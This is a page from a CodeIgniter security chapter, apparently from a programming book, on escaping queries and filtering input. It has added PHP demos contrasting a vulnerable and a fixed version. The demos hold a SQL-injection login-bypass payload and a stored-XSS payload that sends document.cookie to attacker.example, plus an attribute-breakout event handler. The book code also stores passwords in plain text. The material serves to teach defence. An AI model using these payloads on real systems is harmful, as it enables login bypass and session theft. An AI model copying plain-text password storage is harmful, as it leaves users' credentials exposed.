Professional CodeIgniter


Chapter 9: Security and Performance


269


function verifyUser($u, $pw)
{
    // Active Record escapes every value handed to where() before it builds
    // the query, so the raw $u and $pw go in as values. Wrapping them in
    // $this->db->escape() as well would quote them a second time
    // (username = '\'admin\''), and the login would never match.
    // The password is compared in plain text, matching the admins table
    // this book has been using.
    $this->db->select('id,username');
    $this->db->where('username', $u);
    $this->db->where('password', $pw);
    $this->db->where('status', 'active');
    $this->db->limit(1);
    $Q = $this->db->get('admins');
    if ($Q->num_rows() > 0) {
        $row = $Q->row_array();
        $this->session->set_userdata('userid', $row['id']);
        $this->session->set_userdata('username', $row['username']);
    } else {
        $this->session->set_flashdata('error', 'Sorry, your username or password is incorrect!');
    }
}

getUser() gets the same treatment. The incoming $id is handed to getwhere() through the $options array, and Active Record escapes every value in that array before it builds the WHERE clause, so the only rule is that $id must travel as a value and never be concatenated into the SQL text.

function getUser($id)
{
    $data = array();
    // getwhere() escapes the values in $options itself; calling
    // $this->db->escape($id) here would quote the id twice.
    $options = array('id' => $id);
    $Q = $this->db->getwhere('admins', $options, 1);
    if ($Q->num_rows() > 0) {
        $data = $Q->row_array();
    }
    $Q->free_result();
    return $data;
}
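The following stand-alone script is an added example, not code from the book or from CodeIgniter. It shows the injection that verifyUser() allows when the submitted values are concatenated into the query text, and what changes once the values are bound as parameters, which is the effect of letting Active Record escape them. PDO with an in-memory SQLite database stands in for $this->db, and the admins table, its single row and the attacker's input are all constructed for the demo.

```php
<?php
// Added example, not code from the book: a stand-alone demonstration of the
// injection an unescaped verifyUser() query permits, and of what binding
// (which Active Record's where() does for you) changes. PDO with an in-memory
// SQLite database stands in for $this->db; the admins table and its one row
// are constructed for this demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, password TEXT, status TEXT)');
$db->exec("INSERT INTO admins (username, password, status) VALUES ('admin', 's3cret', 'active')");

// Vulnerable: the submitted username and password are concatenated into the
// SQL text, so quote characters in them become part of the query itself.
function verifyUserUnsafe(PDO $db, string $u, string $pw): ?array
{
    $sql = "SELECT id, username FROM admins"
         . " WHERE username = '$u' AND password = '$pw' AND status = 'active' LIMIT 1";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Fixed: the values are sent as bound parameters. The SQL text never changes
// and the input can only ever be compared as data.
function verifyUserSafe(PDO $db, string $u, string $pw): ?array
{
    $stmt = $db->prepare('SELECT id, username FROM admins'
        . ' WHERE username = ? AND password = ? AND status = \'active\' LIMIT 1');
    $stmt->execute([$u, $pw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed attacker input: the quote closes the string literal and the
// SQL comment marker discards the password and status checks that follow.
$payloadUser = "admin' -- ";
$wrongPw     = 'not-the-password';

// With concatenation the comment swallows the rest of the WHERE clause, so the
// password is never checked; with binding the whole payload is compared as a
// username and no row matches.
var_dump(verifyUserUnsafe($db, $payloadUser, $wrongPw));
var_dump(verifyUserSafe($db, $payloadUser, $wrongPw));
```

Run it with php on any build that has the pdo_sqlite extension. The same comment-marker payload works against a MySQL query built the way verifyUserUnsafe() builds it, which is why the model's queries must be assembled only through Active Record or through escaped values.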

For addUser() and updateUser(), you're going to deploy a new function, xss_clean(), which is part of the Security helper (which you autoloaded back in Chapter 3). The xss_clean() function neutralizes malicious-looking JavaScript and other suspicious input, converting the characters it flags into entity references so that a stored value cannot later run as script in an administrator's browser. Note what it does not do: it is not an SQL escape. The values still reach the database safely because insert() and update() escape every element of $data themselves, which is also why no $this->db->escape() call appears in the code below.


function addUser()
{
    // xss_clean() filters the submitted values; insert() escapes them for SQL.
    // Keep in mind that xss_clean() rewrites anything it flags, so a password
    // it alters here will not match the raw $pw that verifyUser() compares.
    $data = array(
        'username' => xss_clean($_POST['username']),
        'email'    => xss_clean($_POST['email']),
        'status'   => xss_clean($_POST['status']),
        'password' => xss_clean($_POST['password'])
    );

    $this->db->insert('admins', $data);
}

function updateUser()
{
    $data = array(
        'username' => xss_clean($_POST['username']),
        'email'    => xss_clean($_POST['email']),
        'status'   => xss_clean($_POST['status']),
        'password' => xss_clean($_POST['password'])
    );
    // where() escapes the id; update() escapes the values in $data.
    $this->db->where('id', $_POST['id']);
    $this->db->update('admins', $data);
}
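The script below is an added example, not code from the book or from CodeIgniter. It shows why a stored value such as the username or e-mail submitted to addUser() must not reach the browser as raw markup, and what converting the suspicious characters into entity references does to it. PHP's htmlspecialchars() stands in for xss_clean(), whose exact filtering rules this page does not show; the submitted values are constructed for the demo. It also illustrates the caveat that goes with any input filter: encoding at the point of output is the check that actually decides whether a value renders as text or as markup, so the cleanest defence is to filter on input as the book does and still encode on output.

```php
<?php
// Added example, not code from the book: shows why a stored value such as the
// username submitted to addUser() must not reach the browser as raw markup,
// and what converting the suspicious characters to entity references does.
// htmlspecialchars() stands in for CodeIgniter's xss_clean(), whose exact
// filtering rules are not shown on this page; the submitted values below are
// constructed for this demo.
function encodeForHtml(string $v): string
{
    // &, <, >, " and ' become entity references, so the browser renders them
    // as text instead of parsing them as tags or attribute delimiters.
    return htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Renders one admins row as an HTML table row. With $encode === false the
// values are emitted as-is, which is the vulnerable path.
function renderAdminRow(array $row, bool $encode): string
{
    $cell = function (string $v) use ($encode): string {
        return $encode ? encodeForHtml($v) : $v;
    };
    return '<tr>'
         . '<td>' . $cell($row['username']) . '</td>'
         . '<td><a href="mailto:' . $cell($row['email']) . '">' . $cell($row['email']) . '</a></td>'
         . '<td>' . $cell($row['status']) . '</td>'
         . '</tr>';
}

// Constructed submission of the kind addUser() reads from $_POST. The
// username carries a script tag; the email closes the href attribute and
// injects an event handler into the anchor.
$post = [
    'username' => 'eve<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    'email'    => 'eve@example.com" onmouseover="alert(document.cookie)',
    'status'   => 'active',
];

// Raw: the script tag and the injected attribute are live markup in the page.
echo renderAdminRow($post, false), "\n";
// Encoded: each < > " ' is an entity reference and both payloads are shown
// as literal text.
echo renderAdminRow($post, true), "\n";
```

The attribute case is the one that input filters most often miss: a value that contains no script tag at all still breaks out of href="..." with a single double quote, which is why the encoding must cover quotes (ENT_QUOTES above) and not just angle brackets.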